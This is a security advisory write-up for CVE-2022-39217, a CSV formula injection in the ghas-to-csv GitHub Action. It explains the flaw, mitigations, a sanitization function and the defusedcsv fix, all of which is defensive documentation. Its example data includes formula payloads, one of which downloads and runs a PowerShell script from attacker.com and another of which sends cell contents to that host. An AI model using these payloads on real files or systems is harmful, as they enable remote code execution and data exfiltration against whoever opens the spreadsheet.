GHSA-634p-93h9-92vh

GHSA-634p-93h9-92vh #

Summary #

FieldValue
CVECVE-2022-39217
Affected Actionsome-natalie/ghas-to-csv
SeverityModerate (CVSS 5.8)
Vulnerability TypeCSV Formula Injection (CWE-74, CWE-1236)
PublishedSeptember 16, 2022

Vulnerability Description #

The some-natalie/ghas-to-csv action exports GitHub Advanced Security (GHAS) alerts to CSV format without properly sanitizing the data. As stated in the advisory: “If an alert is dismissed or any other custom field contains executable code / formulas, it might be run when an endpoint opens that CSV file in a spreadsheet program.”

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L

  • Attack Vector: Network (AV:N)
  • Attack Complexity: High (AC:H)
  • Privileges Required: None (PR:N)
  • User Interaction: Required (UI:R)
  • Scope: Changed (S:C)
  • Confidentiality Impact: Low (C:L)
  • Integrity Impact: Low (I:L)
  • Availability Impact: Low (A:L)

Affected Versions: All versions < 1

Patched Versions: 1 and later

EPSS Score: 0.401% (60th percentile) - Low probability of exploitation within 30 days

Weaknesses:

  • CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
  • CWE-1236: Improper Neutralization of Formula Elements in a CSV File

CSV formula injection occurs when cells starting with special characters (=, +, -, @) are interpreted as formulas by spreadsheet applications. Attackers can craft malicious formulas that:

  1. Execute arbitrary system commands
  2. Exfiltrate sensitive data
  3. Access local files
  4. Create network connections

For example, a repository name like =cmd|'/c calc'!A1 would execute the calculator application when the CSV is opened in Excel.

Data Flow Vulnerability: The vulnerability creates a data flow where:

  • Repository data (including developer dismissals and custom fields) feeds into GitHub Advanced Security data
  • The ghas-to-csv action processes this into CSV format without sanitization
  • Spreadsheet programs may execute potentially malicious content from the CSV when opened

Vulnerable Pattern #

- name: Export GHAS alerts to CSV
  uses: some-natalie/ghas-to-csv@v1.0.0
  with:
    token: ${{ secrets.GITHUB_TOKEN }}
    output: security-alerts.csv

- name: Upload CSV artifact
  uses: actions/upload-artifact@v4
  with:
    name: security-report
    path: security-alerts.csv

The exported CSV may contain malicious formulas if:

  • Repository names contain formula injection payloads
  • Alert descriptions include malicious formulas
  • File paths or code snippets start with special characters

Example malicious data:

Repository,Alert,Severity
"=cmd|'/c powershell IEX(wget attacker.com/mal.ps1)'!A1","XSS Vulnerability","High"
"+HYPERLINK(""http://attacker.com?leak=""&A1&A2,""Click"")","SQL Injection","Critical"

sisakulint Detection Result #

No vulnerability-specific detections. CSV injection is not detectable by static analysis.

General best practice warnings (not specific to GHSA-634p-93h9-92vh):
- Missing permissions block
- Missing timeout-minutes
- Action version not pinned to commit SHA

Analysis #

DetectedRuleCategory Match
NoN/ANo - CSV Injection not detectable

Detection Summary:

  • sisakulint detects general workflow security issues (permissions, timeouts, commit SHA pinning)
  • Does NOT detect CSV formula injection vulnerability - this is expected and correct

Reason for Non-Detection #

This vulnerability cannot be detected by static analysis for the following reasons:

  1. Output format issue: The vulnerability is in the format of the generated output file, not in the workflow configuration
  2. Action internal implementation: The CSV generation logic is inside the action’s code, not visible in the workflow
  3. Data-dependent: The vulnerability only manifests when specific malicious data exists in the source (GHAS alerts)
  4. Post-workflow exploitation: The attack occurs when users open the exported CSV file, outside the workflow execution context
  5. Semantic understanding required: Detection would require understanding that CSV exports need sanitization, which is domain-specific knowledge

Detection category: Output format issue + Action internal implementation

Mitigation #

The vulnerability was addressed in version 1 and later by migrating from the standard csv library to defusedcsv, which provides protection against CSV injection attacks. Users should:

  1. Update to patched version: Use some-natalie/ghas-to-csv@v1 or later

    - uses: some-natalie/ghas-to-csv@v1
  with:
    token: ${{ secrets.GITHUB_TOKEN }}
    output: security-alerts.csv

  2. No workarounds available: Users must upgrade to version v1 or later

  3. CSV sanitization techniques (for reference):

    • Prefix formula characters (=, +, -, @) with a single quote (')
    • Wrap cells containing special characters in double quotes
    • Escape existing quotes properly

  4. Alternative formats: Consider using safer output formats:

    # Use JSON instead of CSV
- name: Export to JSON
  run: |
    gh api "/repos/${{ github.repository }}/code-scanning/alerts" > alerts.json
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

  5. User education: Warn users about CSV injection risks:

    • Open CSV files in text editors first to inspect content
    • Disable automatic formula execution in spreadsheet applications
    • Use “Import Data” feature instead of directly opening CSV files

  6. Spreadsheet settings: Configure spreadsheet applications to warn before executing formulas from external files

Example Sanitization Code #

// Proper CSV sanitization
function sanitizeCSVCell(value) {
  if (!value) return '';

  const str = String(value);

  // Check if cell starts with formula characters
  if (/^[=+\-@]/.test(str)) {
    // Prefix with single quote to prevent formula execution
    return `'${str}`;
  }

  // Escape quotes and wrap in quotes if contains special chars
  if (/[",\n\r]/.test(str)) {
    return `"${str.replace(/"/g, '""')}"`;
  }

  return str;
}

Technical Fix Details #

Version 1 Changes:

Files Modified:

  • requirements.txt - Added defusedcsv==2.0.0 dependency
  • src/code_scanning.py - Changed from import csv to from defusedcsv import csv
  • src/enterprise.py - Changed from import csv to from defusedcsv import csv
  • src/secret_scanning.py - Changed from import csv to from defusedcsv import csv

The Fix: Migrated from the standard Python csv module to defusedcsv, which is a drop-in replacement that sanitizes CSV inputs to prevent formula injection attacks.

Implementation: All four files were modified with a single-line change replacing import csv with from defusedcsv import csv. The defusedcsv library automatically sanitizes CSV fields to prevent formula injection while maintaining full compatibility with the standard csv module’s API.

This approach ensures that:

  • Cells starting with formula characters (=, +, -, @) are properly escaped
  • Malicious content in CSV fields cannot be executed by spreadsheet applications
  • No code changes required beyond the import statement
  • Full backward compatibility with existing CSV processing code

Credits:

  • aegilops (Analyst)
  • some-natalie (Analyst)

References #